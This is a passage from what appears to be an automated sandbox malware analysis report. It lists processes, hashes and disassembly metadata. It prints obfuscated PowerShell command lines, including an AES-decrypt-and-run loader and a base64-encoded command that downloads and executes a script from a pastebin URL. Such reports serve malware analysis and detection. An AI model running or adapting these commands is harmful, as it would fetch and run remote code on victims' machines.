                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591E8E2D5F71F36954FA29E50B541460253DDD47F8D68ADEC9363D782DED5421500BF4FBEE25A669215CB1C1CF9C4E39B42F859E459433536EBB2907989E1A5FC589691387EDB08362925BE79E141A8B621176532558D159FD2B1181F898AA05EEB1EA07A556D6526ACFF59D0D02B5A98F70D6AD20CB5BC07B4752386DCD6CC47CB918CA4AB8B27B8CD3B4ADEE286293420BA6F189987D8E71654846F001ADDA03742803420074C99A7E173A3AF1F07E40C7289919C5405C1BF8A5353A0076DB1E95557A94F9DD0AA6F83884FFA5DE3D8C61567935876B1F332ACB612F634FCAC6BA6072C8BE5661D6B0F2A165601A8CBF9F9DF3F753391F622DB6D5EAC28EEB76EBC8DD9D2F9B58AD024D91420FB02E416BF9CB1115FA4DE78D8634C0977354A5A3528B042F835A34E3B2AA719E59E38CC1C23AE866E10F0F6A1B75704280DB282B9F28720319946E2E42C1C71CB3CE37440E9AC836574DE323A1EE86F3FE448C5BCC423F5F8511F71FAFFCFC235341AF3D1E03B2D48457B15F12ABEBCB12BBF7D97FAE4E57BBD065FE92EAE2804E5A4CB23F8F63844CC023F22B67826B6F5D371262B7CB12B4DD1866657D6802B8BA8F65FEEF4565467CC239F917D93AAF7BE92EFCF3FCDB41866DA32FA7B3920D92A5187C3071762FD5B90058D2A5886857BBBFC1641257F8DF51B742E0D36775465ED3059DF960AA9CE6EA17442B78E7D79CCCF6C68F3A5106F7FA91081B616E536F3C9CE9FABA62C617DB84DEA248D21129E121AC109AC1F445C0489236B29800278CE4C44AAD96EC5A84896CE52146759758532CF0EDAAF5543CAE8091A5D93E45B0489408B3933747118015539E6D2A113E6E38BBCFDBB0C4F67C4F3B9085DEAE9478F58BA64392AB67EEF40B9CDAE975CBB60252F0683FBCD6DA3213FDF689E2EC1960A3842A6DBF718CC1FB567208847E41ECB7196F3CEBE8DA67E076CF9A78D99615A6AC5376D392816D30EC3EE11E891E380AF759932052BDAD62EBAAC8A637E4C0D8E78C05F7A5292076253BC4CC8764E55D595B0A901D5F0B12D1A41B183C5DA19A74BF50D22AE7E3C3F2DC7F99B740ACF26474319680DD6305577E584D9E445067EAFF8A5FE2FFD6722D48DBD50DA9391B1E40040D72ACFD3BAFB31E573428D9A562C36830221B3FF269656E0404B04B67712ECD9A11BE2B987725683494DFBCE427CFD4B1BC13B39A1DB3364671E654F56583E1155DCCE223ADCADC21B4CFB556679B5F6413FA8E33733AC785B00BFA5085E98931898DBC97044D2831337E76508662A8F067D7A4BA9E9800685A75793E895A3E25CEBF048DA05042A904C68D3DB385A07DB95058B0339750373030ABBB0AFA8F5701AFEDDFF97243B2AA2B201452F0D179D0098D775594E469D720050081AE8A2D326F8DC507DA60618DF27FCA45C101E8B651BEE7BB35CAC6FC05F6D8D0260EE5937D0627215D14CD6F415DBDA14A23923355B710E74518171C7AB2FBF67F6E89936F33643ED072D9048B1F470D499E2269D10C4BDA3D2E036ACCEA500CEFE7B6EB2CAACA113FC36D16F917ED9BB4D740F7E41D660E15D2463EA1581C42EC6919DC1E0A780A804BCF0E7FC2AE44182EB42885D55707E32B6D71AA993BE51EAC6D7513934C870B45F0321715A29B15AD8202C074C26148ADE61ED65D21DA94F7EF5CB616C7CA5608F6354EE8B744187BEC5261B209A162E278E3B4F9D1972618759D7555C844659AC6967C78FF1B9CD0AC814EA9EF977A4760D79CDCF97A7761C23DA11D1A5CB64CADE2438719A27A3698D8838794C22809194A8649C262D4E425E84F154F6A45FC8194C9ACFDE794A4CE529562EB7F69BE5DD7637F7D7042943FB3B1DCD77A2754C765AEA874B32A2FDE6445315340AE7A630E204AA9CD2F73EF8E2C8C9CAACF9D1BDA533898FE02AC3F1A6E48CCCDF779D4D53DEAA17B40D403E87A70307F16A4B0EDED94522FC0B4BA5F4D69FD381C16E3D7ABE7F4FD4401920E00BD04985980FCE3FF2F4A011D067AF739ACCFF58A224C866E599F3AC5B49676E01AAC90B973C65C9F01103773D2D8C133ADBE06005041C7C109F8C66189516CBA309737FEDC751C4F604DF4693F58F66913EEE3B038035C1D378A896E499A097E3D58E2F155EF1EE0506B7B8D1A8F18A1A1A716FB7285164D8C43BC1BAA8E98F871AC05C4E24E0A7F1A3993C7169988348083581A931B0C5592E1A3CF20DBCF3863E0E76899710846AF92240621AE31CDB4920925B19B1B07C1D46518248B4D468F4DA7F5D927B04C9BE7294204DDB4652AA452003777F5A3D80EBC42403A3AD15968985046D2E4F47B912D57D5EB899EA9FA0E6694AEFEAAC0F74DF287B54DC5CBD3E3DD891ADF810B6B87075F3CF10C2453528E504E6031E48ECD4E32186B8288C916309C2F3DCFC21E4B460631C73032BBA0AA67B4862C43E4D2454A966D0EEC1D04CD5AD4CC93054B2DE87E25838794ED1F0D11F8BE4EE03D51AD54BA97622534A0116CF79240F6A875E32BEEBF8A63DB83C15492DC24402AD6F208ABC2B5D989467A41D99C8E2300B856B4F5BEFED2EBB87E453FA20A04332FE49B5D249349EB1C6F4C58D68436B04991FDC6146D4E5A4237181E91CC5FBDCD42D75F303F5FC7645670A01FBC67B3B2FB783C4BCF4531734E41CB91B3922683EAC815AC5D6BDA0DDE1F5AA1D854D3CCDB657A7BD10ABD7849EA8463695D4BF1BC5BF54D9DD96BD5C4ED2BCBC536F84874F4DE4D51A607B7F9323F3810D8F1C577884F5E3AEB489DEB99828A96B20316FC0E52F0532D61640DD20E864C91F7F9509080F57DFCDAFB9B001F39FA155ADC3CB62052E2D0B79AB0C7BC932A00900DAD44BE231A095CA9FFCAD9CB574708825CCC56E8B08BB00D88466F8F6AE6585EB08EC24FBA6457E95ACD19CB3895B9E4AFB241F1A8AEDCABBD06F61042EFD60A6C48FC87301CBF951B7C1A1FD9BD8F5A8DBD97AB57CF3D376BA65C822D9D9DA725E615BB9CAC5C3B8325C73C4DB8F8F7C4F3FCE984B1B1EADF24A839E953B914717B4761F0F37DA59CF7B7D9AB1AF204D92364E0FBF747A8CB454B34AFD4D40846BE837344A7B6C733B2FA42B4B0F96FC8FF8ED0EAFFA5F3C2DA522885C45067384');$oPMoB=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((EhNo('52786B594D45786F66546252646B4F6D')),[byte[]]::new(16)).TransformFinalBlock($mbaO,0,$mbaO.Length)); & $oPMoB.Substring(0,3) $oPMoB.Substring(186)
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:02:48:06
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:02:48:08
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc IAAgACAAWwBOAEUAVAAuAHMAZQByAFYASQBDAGUAcABvAGkAbgB0AE0AYQBOAGEAZwBFAHIAXQA6ADoAUwBlAEMAdQByAEkAVAB5AFAAUgBPAFQATwBDAG8ATAAgAAkACQA9ACAACQBbAE4AZQB0AC4AcwBFAGMAdQBSAGkAdABZAHAAUgBPAFQATwBjAG8ATABUAFkAcABFAF0AOgA6AFQAbABzACwAIAAgAFsAbgBlAFQALgBzAEUAQwBVAHIASQBUAHkAUABSAE8AVABPAEMATwBMAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAxACwAIAAJAFsAbgBlAFQALgBzAGUAQwBVAFIAaQB0AHkAUABSAE8AVABPAEMATwBsAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACwAIAAJAFsAbgBlAHQALgBzAEUAQwB1AHIAaQB0AHkAcABSAG8AVABvAGMAbwBsAHQAeQBwAEUAXQA6ADoAUwBzAGwAMwAgACAAOwAgAAkAIABbAG4ARQBUAC4AUwBFAHIAVgBpAEMARQBQAG8AaQBuAFQATQBBAE4AYQBnAGUAUgBdADoAOgBTAGUAQwBVAFIAaQB0AHkAUAByAE8AdABPAGMAbwBsACAACQA9ACAACQAJACcAVABsAHMALAAgAAkAVABsAHMAMQAxACwAIAAgAAkAVABsAHMAMQAyACwAIAAJAFMAcwBsADMAJwAgACAACQA7ACAAIAAJAGkAZQB4ACgAIAAgACAASQB3AHIAIAAJAAkAKABbAGMAaABhAFIAXQAgACAACQAwAFgANgA4ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAYQBSAF0AIAAgAAkAMABYADcANAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAcgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAFIAXQAgACAACQAwAHgANwAwACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAYwBIAGEAcgBdACAAIAAJADAAWAAzAEEAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQBSAF0AIAAgAAkAMABYADIARgAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAcgBdACAAIAAJADAAWAA3ADAAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAHIAXQAgACAACQAwAHgANgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQByAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAQwBIAEEAUgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABBAHIAXQAgACAACQAwAHgANgA1ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMABYADYAMgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAWAA2ADkAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAHgANgBFACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAQQByAF0AIAAgAAkAMABYADIARQAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAUgBdACAAIAAJADAAeAA2ADMAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAHIAXQAgACAACQAwAHgANgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMAB4ADYARAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAAyAEYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAFgANwAyACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQByAF0AIAAgAAkAMAB4ADYAMQAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAA3ADcAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAYQByAF0AIAAgAAkAMAB4ADMAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADAAWAA3ADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABBAFIAXQAgACAACQAwAFgAMwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMABYADUANgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAeAA2ADgAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAFIAXQAgACAACQAwAFgANwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAYQBSAF0AIAAgAAkAMABYADcAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBoAGEAcgBdACAAIAAJADAAeAA2ADIAIAAgAAkAKQApAA==
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:10
                                                                                                  Start time:02:48:08
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Executed Functions

                                                                                                    Function 00007FF848CC3675 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2089194638.00007FF848CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ff848cc0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                    • Instruction ID: 350e2b64e2b085852a6bc8f0893a62b331c053a54393ba2797a471a786993658
                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                    • Instruction Fuzzy Hash: 4401677111CB0C4FD744EF0CE455AA5B7E0FB99364F10056EE58AC3661D736E881CB46

                                                                                                    Executed Functions

                                                                                                    Function 00007FF848CD33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2080450756.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ff848cd0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 293ae8431ce9a3cdd3eeefd5cc1a5689bec792ca2c427d4b90acdb5e17cc8046
                                                                                                    • Instruction ID: 4eaa802fa4823bd1c9398394ef21b1ee28a3cf354c640f9551066e7e57f6d341
                                                                                                    • Opcode Fuzzy Hash: 293ae8431ce9a3cdd3eeefd5cc1a5689bec792ca2c427d4b90acdb5e17cc8046
                                                                                                    • Instruction Fuzzy Hash: 9901677115CB0C4FD744EF0CE455AA5B7E0FB99364F10056DE58AC3661DB36E882CB45

                                                                                                    Executed Functions

                                                                                                    Function 000002995ADE21FE Relevance: .1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000003.2189699666.000002995ADE2000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002995ADE2000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_3_2995ade2000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c5aa5cded8a88d7e9e5aa9da7ca5673701b4177522f8a5f3dc2dfa414b2e9ccb
                                                                                                    • Instruction ID: 4f2ff2ecd620392fc10f058b1449fc41ffa241ab66062e5ceada3572835ef96e
                                                                                                    • Opcode Fuzzy Hash: c5aa5cded8a88d7e9e5aa9da7ca5673701b4177522f8a5f3dc2dfa414b2e9ccb
                                                                                                    • Instruction Fuzzy Hash: AB11651151EBC44FEB5B667C483D36A3BE1DB56210F9B44DFD586CB1E2E8044CC98365
                                                                                                    Function 000002995A6F0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000003.2189751464.000002995A6F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002995A6F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_3_2995a6f0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction ID: fbf8e0f4a1bc386a485a27ea2c10b6c927c6447e579d027b24543318931e6e16
                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction Fuzzy Hash: 689004044D740755D41551D50C4D35D504173CC570FD744C4CC17D014CF44D03DF1157
                                                                                                    Function 000002995A6F0F99 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000003.2189751464.000002995A6F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002995A6F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_3_2995a6f0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction ID: fbf8e0f4a1bc386a485a27ea2c10b6c927c6447e579d027b24543318931e6e16
                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction Fuzzy Hash: 689004044D740755D41551D50C4D35D504173CC570FD744C4CC17D014CF44D03DF1157
                                                                                                    Function 000002995A6F0FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000003.2189751464.000002995A6F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002995A6F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_3_2995a6f0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction ID: fbf8e0f4a1bc386a485a27ea2c10b6c927c6447e579d027b24543318931e6e16
                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction Fuzzy Hash: 689004044D740755D41551D50C4D35D504173CC570FD744C4CC17D014CF44D03DF1157
                                                                                                    Function 000002995A6F0F81 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000003.2189751464.000002995A6F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002995A6F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_3_2995a6f0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction ID: fbf8e0f4a1bc386a485a27ea2c10b6c927c6447e579d027b24543318931e6e16
                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction Fuzzy Hash: 689004044D740755D41551D50C4D35D504173CC570FD744C4CC17D014CF44D03DF1157
                                                                                                    Function 000002995A6F0F79 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000003.2189751464.000002995A6F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002995A6F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_3_2995a6f0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction ID: fbf8e0f4a1bc386a485a27ea2c10b6c927c6447e579d027b24543318931e6e16
                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction Fuzzy Hash: 689004044D740755D41551D50C4D35D504173CC570FD744C4CC17D014CF44D03DF1157
                                                                                                    Function 000002995A6F0F89 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000003.2189751464.000002995A6F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002995A6F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_3_2995a6f0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction ID: fbf8e0f4a1bc386a485a27ea2c10b6c927c6447e579d027b24543318931e6e16
                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction Fuzzy Hash: 689004044D740755D41551D50C4D35D504173CC570FD744C4CC17D014CF44D03DF1157

                                                                                                    Executed Functions

                                                                                                    Function 00007FF8477F227D Relevance: .3, Instructions: 264COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2185867115.00007FF8477F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff8477f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7f1560584926b533ee19add686ddd5279c370eeeb6afa3644adc5f76843016b4
                                                                                                    • Instruction ID: c3171b4a70b43ce2bce6cc518e9e310bb9fbdd23b455d7371b86a72741df5ffa
                                                                                                    • Opcode Fuzzy Hash: 7f1560584926b533ee19add686ddd5279c370eeeb6afa3644adc5f76843016b4
                                                                                                    • Instruction Fuzzy Hash: E1712562A0EBC98FEB56AA3C59A55783FF1EF6725074901EBC448CB1E3D918EC06C341
                                                                                                    Function 00007FF847723A05 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2185345202.00007FF847720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847720000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff847720000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                    • Instruction ID: fb76471e6f5f478bc03e54cb9187a7a2f2ace209373a1a613f15fb66885e60e6
                                                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                    • Instruction Fuzzy Hash: FE01677111CB0C8FD744EF0CE451AA5B7E0FB95364F50056DE58AC3665D636E882CB46
                                                                                                    Function 00007FF8477F04D8 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2185867115.00007FF8477F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff8477f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a216432190955116dcf0ff82557d6ed2aa17512a3a905e6a93f6aa3158f40e8e
                                                                                                    • Instruction ID: 6248eaf8e5cee67790f75344ddbbd4dd3ee6cae91d19cfd173d5244d80cd343c
